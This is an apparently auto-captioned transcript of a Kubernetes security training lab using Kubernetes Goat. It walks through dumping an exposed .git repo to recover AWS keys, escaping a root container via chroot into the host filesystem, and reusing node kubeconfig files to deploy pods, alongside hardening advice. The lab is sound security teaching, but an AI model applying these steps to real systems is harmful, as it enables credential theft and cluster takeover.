Kubernetes Security (AU)


language: EN

WEBVTT
All in the same training now.
Yeah, I see that you're okay.
That seems, yeah.
And here's.
Okay, so let's see what we were discussing about.
So if you do a cat ~/.kube/config,
you will see.
You will see.
You will see this file and it has,
this is our key, this is the certificate,
this is the user, well, the equivalent to user.
So it has a lot of information.
Actually, here are all the clusters that we have installed.
And the tool that we use, kubectx,
what it does is to change context.
I mean, which are the, in this file,
what you will find is each one of the context
or each one of the clusters.
And you can see that is a general file.
It has an apiVersion.
And with kubectl config view,
you can see kind of the same,
but in a more organized view.
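A minimal sketch of the commands being discussed here (kubectx is the third-party context-switching helper mentioned above):

  cat ~/.kube/config          # raw file: clusters, users (keys/certs), contexts
  kubectl config view         # same information, organized and with secrets redacted
  kubectl config get-contexts # list the contexts defined in that file
  kubectx                     # with no arguments, lists contexts; with a name, switches to it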
Okay.
So let's go to our labs.
So is there any question about what we have seen so far?
Okay.
Okay, so let's see the following.
So it turns out that for securing a Kubernetes cluster,
there are, not different approaches,
but different best practices.
And the first one is related to images, to image handling.
I mean, in this situation, what you need to do is
to be sure to use base images that are trusted,
to scan your images for vulnerabilities,
and to avoid putting a lot of software in your images.
So it's part of that step.
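A rough sketch of what that image hygiene can look like in practice. Trivy is just one common scanner picked as an example here, and the image name is hypothetical:

  # scan a built image for known vulnerabilities before pushing or deploying it
  trivy image myregistry/myapp:1.0
  # and keep the image itself minimal: a small trusted base, a non-root user,
  # and nothing installed beyond what the application actually needs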
What we're going to do in this lab, in these labs,
there are some labs here, is to see what happened
or what kind of stuff we can find
when you don't do a proper job securing your image
or a proper configuration of your image.
So this first lab, it shows us what happens
when you leave behind, by accident or on purpose,
for example, the key, the password
for your database, or the key for Amazon or whatever,
which is something super common, super, super common.
So this is the idea of this first lab.
Okay, let's do that.
So let's be at this directory.
I'm going to split this in two.
So we have this folder called labs.
And let's go there, labs.
And please go to the Goat folder.
So we are going to move now to the Goat cluster.
So I need you to execute kubectx with the kind Goat context.
What this command does is
to move us to the different cluster,
to the Goat cluster, which is,
this is a cluster in which we have several scenarios
for hacking purposes.
This cluster is super beautiful.
So we can play a lot there if you want.
So before executing anything,
we are going to check where we are, with kubectl
get all --all-namespaces.
In the end you start learning
or memorizing all of these commands
because they're kind of similar.
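A sketch of those two steps; the exact context name depends on how the kind Goat cluster was created, so treat it as an assumption:

  kubectx kind-kubernetes-goat-cluster   # switch to the Goat cluster (run kubectx alone to list the real names)
  kubectl get all --all-namespaces       # verify every pod is Running, with no CrashLoopBackOff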
Yeah.
What does Goat stand for?
Goat.
Yeah, it's called that because it's a project
from this guy who created this environment.
But I'm not sure, I'm looking here.
Actually, this is the goat.
So I'm not really sure if it stands
for anything in particular, but probably.
Okay, so if you run this, get all namespaces,
you will see a lot of stuff.
I'm going to maximize this terminal just for a while.
So these are different pods that are run here.
Please check that all of your pods are running,
that there is no CrashLoopBackOff or something like that
because that will affect the lab.
These are different scenarios to work with.
We're going to try to work with the most of them,
but probably we are not going to be able to.
There are the services, the services published here.
The DaemonSets, the deployments.
So just for the sake of curiosity,
if you want to check one of those deployments,
get deployments slash, let's see, for example, this one.
You can take a look at whatever you want.
So I use the health check deployment.
Yeah.
So it shows.
So what is this unknown state?
I don't know what that means.
Oh, this unknown, I haven't seen that state.
This is not the first time.
Let's stop.
Is that a pod?
Oh yeah, it's a pod.
Yeah.
Let's take a look.
Oh yeah.
Actually, there are three hidden layers.
Two are unknown state and one is running.
Is this the same for you or not?
No, you have only two.
One unknown state.
Okay.
Unless everything is good.
Okay, let's see.
I think this is one scenario in which the image
in one of the layers has information or vulnerability.
So let's see when we reach that to see what it is.
Okay, so checking the deployment now,
you can see this is like a standard one, it's very basic.
The container, it exposes a port, it's super simple.
And that's it.
So this is scenario, the one that we are going to work.
It shows like a popular mistake, a super common mistake,
which developers and DevOps fall into
when they package their artifacts or their applications.
So the idea is to test different misconfiguration,
identify an entry point within the web application,
and then see tools to help us to identify
this kind of errors to be able to solve it.
So what we are going to do is to run this script.
Ah, before that, let me show you something.
Just for navigation purposes, with docker ps,
you can see the Docker containers that we are running.
All these clusters are running on top of Docker,
the clusters that we have.
And this one in particular is the Goat,
which only has one container, one Docker node,
but the others have like one worker and one control plane.
And this is the script, access-kubernetes-goat.sh.
What it does is to expose,
on the ports of this system,
on ports 1230 to 1236,
the different scenarios that we're going to work with.
So let's run this script with ./access-kubernetes-goat.sh.
So, I don't really get, what does this script do?
What this script does is execute a command
which is called port forward.
And with port forward, what we do is to,
so actually, you know what?
No, don't execute the script.
Let's do it now also.
It gives us like a better sense of what we want to do.
So just execute a cat on access-kubernetes-goat.sh.
And we are going to expose the first scenario
which is sensitive keys.
In order to do that, we need to identify the pod
that is running that scenario, which is here.
So you can copy these lines and execute it.
So if you take a look, this command,
what this command does is to get pods,
but it has more like more information.
So let me show you a simpler way to do that.
Because if you take a look at the command,
it's kind of complex.
Get pods, dash dash namespace default.
Okay, that part is simple.
It says where, the default namespace,
but then there is dash l, the label selector.
So what it does is to look for pods
labeled with app equals build-code.
And the output, it gives the output in JSON,
but what I want from the JSON is this key,
this specific key.
Got it, okay.
Yeah, but I mean, the lazy way to do the same is like,
well, actually we don't need to define the default namespace
because it's the default namespace.
We can do a kubectl get pods and grep.
Ah, actually, dash o wide shows,
I think it shows us the,
this kubectl get pods, grep code.
So it will show us which one has code in it.
But the thing is that, I mean,
this is easy because there are not too much pods,
but when you are having hundreds of pods,
usually you would want to be sure.
So that is why the labels are important,
and these JSONPaths,
because this can be exported not only in YAML
but in JSON, and with JSON you can filter that way.
So what this is giving us is the name of the pod,
the specific pod that is running this, this lab.
So we are going to copy that, that name.
And then we are going to expose that pod
and the specific port of that pod in our server.
So that will be dash dash address,
0.0.0.0.
So it's like this command,
but the pod name you need to change it, right?
Yeah.
So if it runs,
it keeps the terminal locked.
And it's okay, let's leave it like that,
just to test it right now,
and to understand what we are doing.
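A sketch of those two commands, assuming the app=build-code label and the 1230:3000 port mapping used by the Kubernetes Goat access script:

  export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
  kubectl port-forward --address 0.0.0.0 $POD_NAME 1230:3000   # keeps the terminal busy while it forwards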
And then go to localhost.
This is the service that we exposed.
Where do I open the browser?
It's over on top, at the top.
And localhost, localhost colon 1230.
So the port is going to be?
1230.
So the objective in this scenario is to identify
the sensitive keys that are exposed,
that are available in the code base of this deployment.
This may include the application code,
the container, the infrastructure.
So here we are using our hacker hat.
The idea is to, okay, how can we do that?
So if you were a hacker and you are facing this website
and you want to explore if this website,
in this service, in this application,
there is something valuable for you.
I mean, like in this case, some keys, some secrets.
What will you do?
What do you think that will be the first approach
to execute?
And take into mind, into consideration
that we are outside, we are, okay, I'm here.
This is what I'm seeing.
What should I do?
What do I do?
I would go and right-click and inspect.
Right at what?
Sorry.
I would go look at the page source.
For example, that's a great idea, yeah.
To see what's in there.
So there are, for example, there are different tools
that we may use.
Gobuster, it's one tool.
DirBuster is another tool.
But there is a simpler one,
which is like, actually it's unbelievable,
but it's super common.
And it's that if you, if you,
I mean, you're familiar with a Git repo's structure, right?
Yes, yes, yes.
So where is the information in a Git repo's structure?
I mean, the, like the basic configuration of the repo.
Exactly.
So it's unbelievable, but there are hundreds,
if not thousands, of websites
which have the .git config exposed.
So in this case, this is one.
So if you take a look.
So there are tools that allow us to do this via brute force,
but we are not going to do it right now,
because I mean, let's go straight to the point,
but that's the idea.
So it turns out that, okay, you may think, okay,
but there is not much information here.
So what can I do with this information?
So it's, this is, I mean, this is amazing.
I will say that let's, you have your two terminals, right?
Yeah.
Let's move to our workspace, k8.6,
so the other directory.
Move to this directory, k8.6.
So there is this tool called git-dumper.
Execute it here, and let me show you git-dumper.
Ah, well, before that, let me show you one of the others,
Gobuster.
Gobuster, this is a tool for brute force
that allows you to explore URIs.
It's in Go, so you can download it here and install it.
Perhaps we can do that later if we have time,
but this will allow us to find stuff like that.
And this one that we're going to use, git-dumper,
is a tool that, if you have a .git config around
or a .git directory exposed, you can use to rebuild the repo.
Go.
So it's super, super cool.
So what we're going to execute here is git-dumper,
and we know the URL, let me,
let me copy, yeah.
That's the path with the .git.
And we are going to create the folder for this repo.
I'm going to call it like this, it's k8s.git.
Let me copy this for you.
And let's run it.
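A sketch of that invocation; the tool name here is git-dumper (the exact tool the trainer uses is garbled in the recording, so take this as an assumption), and the port matches the first scenario:

  pip3 install git-dumper                          # if it isn't already installed
  git-dumper http://localhost:1230/.git/ k8s.git   # rebuild the exposed repo into the k8s.git folder
  cd k8s.git && ls -la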
And this is like, wow.
So, I mean, the first thing that you will need to do is,
okay, let's explore, because I mean,
it's super common to have your website in a Git repo.
That's something, or a service, or something particular.
So what you want to do is, okay,
let's scan all my websites which are running
this kind of platform, or actually in any platform,
and see if that git config file is available.
So this is a typical scan in the internet.
And if that's the case, like this one,
you will have a repo created here.
This is all your code base.
If you do an LS, okay, I can see some stuff.
Let's understand this repo.
So the first thing that you probably will do
is git log to see, okay, what is in there.
And here is, you need to, I mean,
we are in the, like trying to grab the most information
that we can in order to access
or to exploit this information.
Because, I mean, we have a copy of the website,
but that doesn't have any much value.
We are looking for customer data, or keys,
or passwords, stuff like that.
So in git log, probably we may see stuff interesting.
There is actually, I'm going to show you.
There is a commit with environmental variables.
So I'm seeing the git log.
I can see the git status.
It looks like something.
I can do a find to see stuff, like here.
I can see something which is typical
in this kind of application, which is that .env file.
In this case, it doesn't show anything.
However, going back to the git log,
and if you can take a look to the git log,
there is this commit which has the,
the message talking about environmental variables.
So take a look.
Take a look and let's, as we have all the repo,
we can check out that part of the repo
and see if it makes sense.
So we'll check out.
So if we execute that, we will have the information here.
And in this case, there is that .env.
Execute an ls -la.
And in this case, you will see that .env file.
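A sketch of that sequence (the commit id is whatever the log shows for the environment-variables commit, so it's elided here):

  git log --oneline        # look for the commit whose message mentions environment variables
  git checkout <commit-id> # move the working tree to that revision
  ls -la                   # the .env file is present in that revision
  cat .env                 # it contains the AWS access keys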
There is a tool that allows us to execute this as well.
I mean, in this approach, we are outside, right?
We are outside of the system, and it was done manually.
But we can be inside the cluster.
If you are doing the same for your own systems,
you may want to do the same from the inside as well.
So first, analyze this.
This environment file has all the Amazon access keys.
So it's a big deal, because you could deploy
a cryptocurrency miner
into this Amazon customer's account as well.
So let's see the other side of this.
I mean, being the administrator of the Kubernetes cluster.
So in this case, let's explore the pods that we have.
We are talking about this application,
the build-code deployment.
So we can have a shell inside that pod.
So in order to access that pod, there is this command,
exec, which is the same as in Docker.
Dash it, dash dash, sh.
So let me copy that for you.
Now my system is faster, so I can.
So if I execute that, it will take me inside the pod.
So I'm inside the pod.
I can run some commands here, ps.
Let's take a moment here to explore what is a container.
So the first thing that you will notice is
if I execute ps or ps aux,
it will show me like two, three processes running.
If I go to a different terminal,
let me send this to the background.
If I go here and execute the same,
I mean, you're talking 520 processes.
So that's the first difference that you will notice.
Now the second difference here is,
let me show you this.
Let me show you this.
The first thing that you'll notice here
is that the process number one,
the PID number one in a Linux system
usually is the init because it's the one
that executes the services within the system.
But in this case, in this case is the application process.
So yeah, so when you are inside a container,
you don't have too many tools,
it depends on the container or the image.
For example, this one has a lot of tools.
I mean, a ping, you are not supposed to have a ping
inside a container.
That's a bad practice.
You need to have the least possible installed.
Let's see what else we notice.
Okay, this has a lot of stuff,
this container, this image.
If I take a look at /usr/bin,
there is a ton of stuff.
So there is another lab in which we are going to exploit this
to access the host.
So, okay, in the meantime,
what I want to tell you is this, which is super important.
As we are so limited in comments in a typical container,
I want to know the most possible about an application.
So we are going to use like
the Linux knowledge that we have.
And it turns out that there is this system directory
called proc from processes
that has the common line for everything that is running
for each one of the processes.
So I can see what was executed to run this application.
But the few common line, in this case, is super simple.
So it doesn't show too much of the same.
Okay, this is, okay.
So I was telling you that there is this utility,
which is called trufflehog.
It's installed here,
just for demo purposes.
But this tool, and let me show you the repo,
it's a tool that allows you to scan for credentials
in every place.
I mean, you can look for credentials in GitHub,
in an image, in a directory, in a website.
So if we use it here,
hopefully it will be able to show us something.
So it does a crawl down there.
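A sketch of running it against the dumped repo; the exact flags depend on which trufflehog version is installed, so this assumes the newer v3 syntax:

  trufflehog filesystem .          # scan the current directory for secrets
  trufflehog git file://./k8s.git  # or scan the git history of the dumped repo itself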
So the solution for this kind of, I mean, this situation,
okay, it detected the credential.
So the solution for this, I mean,
as a part of your pipeline,
in DevOps, the CI/CD pipeline,
the idea is that you execute this kind of utility
to scan your images,
because, I mean, this was just an accident.
The developer forgot to include that file in the .gitignore.
So that may cost a lot in the end.
So this kind of stuff is what is supposed to be avoided.
So can this kind of scan be a part of our cluster definition
itself that when...
Actually, that's a great question,
because yes, there are some policies.
I mean, there have been a lot of changes here.
There was something called Pod Security Policies,
in which you can define some policies
to handle stuff like that.
But that was actually deprecated
in one of the recent versions.
And now we're talking about Pod Security Admission,
the Pod Security Admission process.
Yeah, Pod Security Admission.
And in this case, it's like, let's call it a filter.
And this filter, when you send something
or try to deploy something,
it will check that it fulfills the policies
that you have defined it to be fulfilled.
So it doesn't check at this level,
but it checks if, for example,
the image was scanned or not.
So if the image wasn't scanned,
it won't allow you to deploy it.
So in this particular case,
what you need to do is, in your pipeline,
when you are creating the image
that is going to be deployed inside Kubernetes,
to do this scan, to check this stuff.
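For the admission side, a minimal sketch: Pod Security Admission is driven by namespace labels (checks like "was this image scanned" usually come from a separate admission webhook, which is an assumption beyond what's shown in this lab):

  # reject pods in this namespace that don't meet the "restricted" profile
  kubectl label namespace default pod-security.kubernetes.io/enforce=restricted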
Yeah?
Yeah, yeah.
Okay, okay.
So let's do that as well.
Okay, so now are we going to...
It's okay, right?
Or is there any question?
So let me, let's bring that process from the background.
Background, and let's stop it.
And now that we have clear what we are doing
with this script, we are going to run it completely
because that will be easier to navigate.
So just stop it.
You bring the process from the background with fg,
you can bring it, okay, and Ctrl+C, perfect.
And now we are going to run this script.
Okay, perfect.
So go to this URL,
and this is the Kubernetes Goat documentation.
I mean, so there are a lot of labs here.
We are going to do some of those.
But I mean, as you can clone the repo,
you can do it by yourself later and explore more.
So we just did this one, the sensitive keys,
which is kind of beautiful.
Let's do the next one.
Let me check if this is the next one.
Let's do this one, this one.
The container escape to the host system.
So this is on 1233.
So let's go to localhost.
It's slow, it is slow again.
Perfect.
So this is one of the,
I mean, the most dangerous attacks,
because a misconfiguration,
a common misconfiguration in Kubernetes
or in a container environment,
may give an attacker access to your host system.
I mean, the host system would be the actual server
which is running the Kubernetes nodes.
So if you have that access,
I mean, you can do a lot of bad stuff inside your company.
So this is like a big case.
And well, this applies a lot of stuff.
So the idea here with this scenario
is that we're going to exploit a container
and escape out of it.
I mean, to go up to our host system.
And this will show us why it's important
to run all the containers with non-root users.
Actually, I would say the most common setup
is to run containers with privileges, as the root user.
It's super common and this is super bad.
Okay, so in this scenario,
we are directly in the container.
We have access to the container.
And this, you can imagine that,
I mean, if your application,
the application, the web application or the service
has a vulnerability that was exploited
and was able to provide a shell to an attacker,
which is actually fairly common.
And this will be like the second level
what we are seeing here.
I mean, here we are assuming
that there was a vulnerability in your application
that allowed to an attacker to get a shell
from that container.
So if that container is running as root,
as is the case here,
you can try to escape from the container
to the host system.
So there is a technology in Linux,
which is the capabilities.
Are you familiar with SELinux?
Have you ever used that or heard about it?
I mean, we have our sysadmins
and they do implement SELinux.
So I know that it is very restrictive.
Yes.
Sometimes it makes our lives really difficult,
but I think that's important as well.
Absolutely, absolutely.
Because usually, there was this time
when everyone preferred to disable
or not enforce SELinux,
but that's like losing a lot of power and control.
So the Linux system has something called the capabilities.
And these capabilities are, for example,
the permission at a kernel level
to execute a ping,
to become a super user,
to write on the file system.
So it's really important.
So what we are going to do is use a tool called capsh.
And I'm going to show you here, capsh.
It comes in several distros.
So it's a shell that allows you to access
or to interact with the capabilities of the Linux kernel.
So it shows you what capabilities are available.
So with capsh --print,
you will see all the capabilities
that this container has.
So the idea here is that,
I mean, this container has two things here.
One is that it's running as a root user.
And two, it has basically all the capabilities available.
If you take a look, for example,
there's the capability to execute change owner.
So you can change a file to a different owner.
The capability of change root, SYS_CHROOT.
So we're going to use that one.
The capability of killing a process, for example.
So they would be able to kill my application.
And if you read everything here,
these are all the capabilities to install software,
to change the network.
I mean, it's super, I mean, it's the power of Linux in the end.
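A quick sketch of checking that from inside the container:

  capsh --print             # lists the capability sets granted to this shell
  grep Cap /proc/1/status   # the raw capability bitmasks of PID 1, for comparison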
So one of these capabilities,
let me see, let me see, where is it?
The idea here is that, okay,
let's see which of these capabilities I can use
to gain further access to this victim
that I'm attacking.
So I can execute a mount command,
and that is because I have the SYS_CHROOT,
the change root capability, available.
You know, in Linux, there is this concept of chroot,
changing root.
So I have the root of one system,
but if from this system I can access another file system,
and access it locally,
I can move from my current system to that other system.
Yeah.
So this is what is used when you rescue
a Linux server that has failed.
So you start your server with a USB drive or with a CD,
and the USB drive starts a Linux system,
but in the hard drive or your server,
there is another Linux server, another Linux system.
So from the USB, you access the file system
in the hard drive, and you change root,
move from the USB to the hard drive,
and work in the hard drive and do stuff.
So what we're doing here is the same.
I mean, the container has a root,
and the container has access to the file system.
For example, if the container is a web application,
and the web application, the files of the web application,
are located in the local file system of my node,
and are shared with the container,
then I can change root to that, and from there, do stuff,
or see what I can do, depending on where I am.
So that's what is happening here.
So one, okay, here.
If you take a look here,
you will find the slash host-system.
Oh, wait, it's slow again.
So this host-system is the,
well, my host system, I would say,
is where the container is running.
So if I take a look, oh, that's slash,
okay, it's there, host-system.
If I do an ls host,
no, wrong, host-system,
to see what is there.
Okay, it's not that.
But if I do an ls -las slash host-system.
So this is huge because,
like this, I can see what is inside that file system.
So I'm in the Docker, I'm in the container, sorry,
and the container has a folder
that reflects the file system underneath.
So what I'm going to do is jump from here to here.
This is what we're going to do.
So this is it, chroot is the command,
and host-system.
And after that, I'm going to tell it
which command I want to run.
And the command that I want to run is
sh, which is the standard shell.
we can explore a little bit that file system.
Let's see, okay, let's see if find exists,
host, file, system.
Yeah, it exists.
So it shouldn't be there.
That's, I mean, the less your image has, the better.
I mean, it doesn't have, it should have nothing.
Nothing beyond what your application needs to have.
That's super important.
So if I execute the file, I mean,
I can explore and understand everything.
And actually, what we are seeing here is this system.
Yeah.
Is this system.
So let me stop here and...
Okay, I can see all the commands that are here.
So anyway, I'm going to change root now.
Host, dash, system, bash.
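The two steps as commands, exactly as this scenario sets them up:

  ls /host-system              # the node's root filesystem, mounted into the container
  chroot /host-system bash     # pivot into it and open a shell on the node's filesystem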
Okay, I mean, it doesn't seem like anything.
It's like nothing happened there.
But if I execute an ls, I will see,
okay, something is different here.
Yeah, actually, I even can ls home,
for example, to see what is inside.
Okay, it didn't show anything.
ls root, let me see.
ls bar.
ls etc.
Okay, so it's all that information.
So let's think again.
I mean, we had access to a shell,
which is running in a container.
And we are exploring what we can do from that container.
As of right now, we were able to jump to the host system.
So what I can try here is that,
as I know this is Kubernetes,
and usually Kubernetes uses Docker,
I can see, okay, let's try Docker, docker ps.
So it didn't show anything.
Perhaps I will have to use the full path.
So let's use our,
actually, let me see.
Okay, with, I mean, as I changed root,
I usually don't have the PATH set up,
and the environment variables set up.
So if I execute su -,
it makes me root with the proper environment variables.
So that way I will have better access
and don't need to know the path to all the files.
So let's try again, docker ps.
Oh, it's not there.
But I can see here, I mean,
with ps, I can see a lot of stuff here.
So probably it's that I don't have
the proper path or something.
Let me,
okay, Docker environment.
Let's see that file.
It didn't show anything.
Let's try,
okay, it's not there, but let's try this.
Let's see if it's in another folder.
Oh, it's not there.
I just realized something.
Okay, for example, I just found the kubeadm conf,
and perhaps I will have that kubeconfig here.
Let's see if we have it.
Yes.
Ah, but there is no conf there.
Let's see if kubectl is there.
Okay, I do have kubectl,
but it's not necessarily connected.
By default, kubectl
barely has any configuration.
So we can take that.
Okay, so let's see.
I mean, this must have, actually I'm wrong.
We are not in the host system.
We are not in the host system, but in the Docker container,
in the Docker container that is running the node.
Yeah, that is why we don't have Docker,
because we are here inside this Docker container.
So there is no Docker inside this Docker,
but we do have other information.
So,
so let's go to var lib.
Okay, so here is kubelet.
So if we execute ps aux grep kubelet,
we can see all the information on the kubelet,
and we can see, for example, the kubeconfig files.
So what we are going to try here is,
let's see if we can find the kubelet config.
There is a config.
Okay, and this is the kubelet file.
So, kubectl dash dash kubeconfig.
Config is, yeah, the config.
Then get all, dash dash all-namespaces.
Let's see if it works.
No, let's see, that is not quite right.
It's the same error, I think you're seeing.
It's running.
I'm going to run it, let's try this.
It should be,
no worries here, because what we can do here,
once we are able to find the kubeconfig,
is that we can deploy another application here.
We can deploy on this node another application,
which is kind of huge.
I mean, this is the API server.
Let's try this one.
So kubectl,
dash dash kubeconfig, kubeconfig.
Let's see if it works.
So it worked.
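A sketch of that escalation from the node; the file paths are the typical kubeadm/kind locations and should be treated as assumptions:

  ps aux | grep kubelet        # the --kubeconfig flag in the command line shows where the file lives
  ls /var/lib/kubelet/ /etc/kubernetes/
  kubectl --kubeconfig /etc/kubernetes/kubelet.conf get all --all-namespaces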
Okay, so it worked with this one.
So what we're going to do is just try to deploy
Hello World application.
Just to prove the point.
The bad thing with this stuff is that you lose track of time.
So the idea is that we went for lunch at 12.30, yours,
but I guess that we can go at 1 p.m. for you.
It's okay.
So, the kubeconfig.
I just sent you the command.
So let's try to deploy something.
Let's see if it allows us to do that.
Before that, let's see the notes.
Okay, we are able to see the custom.
Let's try to deploy an application.
Give me just a second because I'm looking for the YAML file.
Let's see if it works.
Need one, I found this one.
Okay, so.
Oh, there's enough.
You need to copy by hand.
That's a normal.
Yeah.
Actually.
Well, yes, because I have to wait a second.
No, but I can't copy given this is a time.
Let me check that I have it, if I have it right.
Well, it's okay.
Okay.
Let's see if it is able to deploy.
Oh yeah.
Well, that's the best way to learn.
Let your fingers learn.
I have something that I call password fingers.
I mean, I don't remember the passwords,
but my fingers do.
So I let them write, every time.
So what exactly, this is just a simple hello world.
Application.
Just a basic deployment.
Yeah, that is right.
Actually, you can open the file.
Okay.
Take a look.
Oh yeah.
Oh, it didn't, I mean, it probably failed,
a typo or something.
But I think that, yeah.
Let me create something,
actually something simple.
Should I type the entire thing
or are we looking for another one?
No, try to run it, because it failed in my case.
I'm not sure, perhaps on your side it's able to deploy.
Okay.
I'm going to try to deploy nginx.
I think it's nginx.
So here it's able to run.
Okay.
I mean, in this case it failed as well,
but I think that we have the idea.
but I think that we have the idea.
Obviously, I mean, there are plenty of options
to try this.
Let me think about an image,
because it should be smaller than nginx.
In this case, it required something.
Okay.
I mean, in this case,
you would have to make some changes
to the configuration of the control plane.
But I mean, you have authentication against the API server,
kubectl works for you.
I mean, it's obviously limited,
but strong enough to install a crypto miner for sure,
I guess.
Okay.
So I don't know if there's any questions regarding this.
A lot or not?
No, no, no.
I mean, yeah.
I mean, if it had run,
probably I would have a better understanding
of how exactly this is going to impact.
But what I understood is that for this to work,
you at least have to be inside of the Kubernetes cluster.
Not really.
In this case, you are inside the container.
The container.
So let's say that you have an application,
a Node.js application or Angular or whatever.
And that application has been compromised,
has an exploit.
This exploit allows you to get a shell in the container.
Yeah.
So I mean, that depends on your application per se.
So you were able,
the attacker was able to gain access
to your container via shell.
So that's an issue.
An application problem in the code,
it wasn't properly secured, whatever.
So in this case,
the attacker exploited a Kubernetes
or a container misconfiguration,
in the sense that the container was running as root
and had all the capabilities of Linux enabled.
So he was able to, from the container,
jump to the host system.
And once inside the host system,
which is the worker node or a control plane node,
he has access to everything that this node has,
which is the ability to run more containers,
to connect to other containers,
to destroy the node, remove everything, for example.
So that's why it's big.
And we are doing this because in the next,
in the next labs, we are going to eliminate the capabilities
and avoid the use of root.
So no matter if your application has an exploit
and is able to give a shell,
the person won't be able to do anything,
because your container, or your cluster, is secured.
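A minimal sketch of that hardening on a pod spec; the pod and image names are hypothetical:

  # hardened-pod.yaml, applied with: kubectl apply -f hardened-pod.yaml
  apiVersion: v1
  kind: Pod
  metadata:
    name: hardened-app
  spec:
    containers:
    - name: app
      image: myregistry/myapp:1.0
      securityContext:
        runAsNonRoot: true               # refuse to start if the image wants to run as root
        allowPrivilegeEscalation: false
        capabilities:
          drop: ["ALL"]                  # no SYS_CHROOT, no CHOWN, no KILL, nothing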
Yeah, so I think you already answered my next question.
So basically, I mean, even if you have the vulnerability
to gain the shell access,
as long as that itself is secured,
hackers cannot do, I mean, of course,
you need to secure your one as well.
You need to make sure there are no vulnerabilities
but at the same time, multiple levels of.
And that's the biggest issue with Kubernetes
because I mean, there is the application layer.
So the application per se, that's a whole another story
about how to secure that application.
You have the platform or the container
where your application is running.
So this container, which is the one
that we are talking about,
behind that you have the Kubernetes cluster.
Behind that or beneath that,
you have your virtualization environment
or your platform, or your servers.
So it's like four layers that you need to cover.
And actually, that's the disadvantage that we have
because the attacker, he only needs one entry point
to do whatever he wants.
In our case, we need to see everything.
We need to check the application, the container,
the cluster, the server, the virtualization.
It's super hard.
It's a lot of stuff to analyze
because in the first lab,
he was able to find just an entry point.
And from that entry point, he gathered more information.
In this case, the same.
He was able to cross one of your defenses.
Look at this in that way.
There are multiple lines of defense
and he reached the first one.
If you have a second strong line of defense,
okay, he did that, but he wasn't able to do anything else.
But in this case, he was able to go inside
and go deeper and deeper.
And we can stay here the rest of the day doing the stuff
and we will be able to do it.
So that's it.
That's it.
Okay, so let's see us in one hour
and have a good lunch.
Sorry.
And let's keep going.
Okay.
All right.
Okay.
Thank you.
See you then.
Bye.
Hi.
Hi.
Okay.
So let's move on.
Do you have this side come on?
I was able to deploy the application.
I'm going to show you.
Okay.
So what went wrong there?
It was, I mean, there were more kubeconfig files
in the same directory and one of them worked.
So give me just a second.
Okay.
Show you.
Okay.
So.
So now we're going to,
let me show you first.
So, okay.
So I was able to deploy this, this instance.
It turns out that, I mean, the error that we saw,
it's because, actually for security reasons,
the kubelet kubeconfig file, to name it somehow,
has this restriction.
It only allows creating mirror pods, nothing else.
Which is just exactly
what we were trying to do.
However, in the same directory,
which is etc kubernetes,
there are more files and kubeconfigs.
And I used this admin one.
And with that admin, I was able to deploy,
to deploy another,
another pod.
So, tell me.
Go on.
Listen.
So with this admin kubeconfig,
we can try the deployment.yaml that we were trying.
Well, actually, yeah.
Okay.
Oh no, I have to type a lot.
Yeah.
It's super hard.
Let me look at the history.
This one, the hello world.
That's true.
Yes.
Yeah.
So we need just to change the master.
Oh, oh, master.
Yeah.
Oh, what happened?
This admin, that's what I remember.
Ah, yeah.
Sorry, it's admin.
I got confused.
I think that is taking some time.
Yeah, it's kind of like,
actually, I think I was able to copy.
Yeah.
Let me shorten that because I was able to copy the text.
Okay.
Interesting.
It's there.
How did you copy?
Controls?
Yeah.
Okay.
So in theory, control V should work as well.
It's here.
So we have run two scenarios so far.
The first one was like
a misconfiguration in the image itself.
So it needs to be addressed by,
when you create the image, scan the image
to see if stuff like that happens.
The second, which is this one,
we are addressing here two things,
which are the security context.
One is being able to execute as,
or the container being executed as, root.
And second,
the capabilities available.
The container has access to everything.
And next we're going to do one related to network policies
to be able to access from one application
to another in the same cluster.
And then the users permissions.
And see how it works.
And then we start to create policies to block that stuff.
Okay.
It's taking a lot.
We can leave it there and see later.
So let me show.
So what we're going to do now is this scenario,
which is called Kubernetes Namespace Bypass.
So it turns out that
by default, Kubernetes has a flat network.
Almost everyone assumes that if my application
is in X namespace,
there is no access to a different application
in a different namespace.
I mean, if I have namespace X and namespace Y,
they can communicate in standard Kubernetes,
with the flat network.
That implies that, for example,
if I have an application which has a cache store
or a local database or some data or something,
I can access from a different application to that.
So if in your cluster you have 100, 200 applications,
and one of them has a vulnerability
that allows a hacker to somehow exploit it or access it or whatever,
that means that this hacker will have access to everything,
to all that you have in your cluster.
So that is pretty bad.
So actually a lot of the exploits or the hacks
that have happened have been because of this,
because an application had a vulnerability,
it was exploited, and then they accessed
a different application within the same cluster.
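The usual mitigation is a NetworkPolicy; a minimal default-deny sketch (the namespace name is just an example, and the cluster's CNI has to support NetworkPolicy for it to take effect):

  # default-deny-ingress.yaml, applied with: kubectl apply -f default-deny-ingress.yaml
  apiVersion: networking.k8s.io/v1
  kind: NetworkPolicy
  metadata:
    name: default-deny-ingress
    namespace: secure-middleware
  spec:
    podSelector: {}          # selects every pod in the namespace
    policyTypes:
    - Ingress                # with no ingress rules listed, all inbound traffic is denied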
Okay, so we are going to see,
well, that flat schema of networking,
and see what we can scan in the network,
and see if we can find other stuff
or other systems as well.
So in order to do this, what we are going to do is,
let me go here.
Okay, it failed.
Well, this is a silly error, to be honest.
It's here.
It says that it failed because it wasn't able
to find the resource mapping.
And there are no matches for kind,
the type of object or resource, Deployment,
in extensions v1beta1.
This happened because probably this manifest,
this deployment, is too old.
The apiVersion says extensions.
And right now, Deployment is already in apps/v1,
I guess.
So it's just a matter of correcting this deployment,
correcting the apiVersion.
So this is a good thing.
Okay.
Okay, so let's see our pods.
Let's go again to our system to get pods.
So there are different pods.
What we are going to do is we're going to launch a pod
called Hacker Container.
This pod has, well, it's for this lab.
It has a lot of networking utilities
that allow us to see, to explore the network
within the cluster.
As it is.
So for doing that,
sorry.
And we are going to run it.
Hacker Container.
Let's go.
Let's launch Hacker Container.
So we can copy this for you.
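The launch command, as the Kubernetes Goat scenario uses it (image name taken from that project):

  kubectl run -it hacker-container --image=madhuakula/hacker-container -- sh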
Okay.
Let's see the pods here.
Actually, we can see the pods that we created
on the other side here.
I'm going to remove those.
Okay, you should have the shell by now.
If you don't see the prompt coming, just press enter.
It should show you something like this.
Let's do it.
And
just a second please.
Sure.
Okay.
So,
okay.
You can remove that.
Oh, no, perhaps you didn't create it.
I didn't create it.
Okay, no worries.
So we are using this container.
It's a shell, we don't have the dashboard here.
Let me check.
Let me try to install the dashboard in this cluster,
because it would be useful to see things more easily.
So let's see if it works.
Let's try to run it.
Let's see if it installs.
Okay.
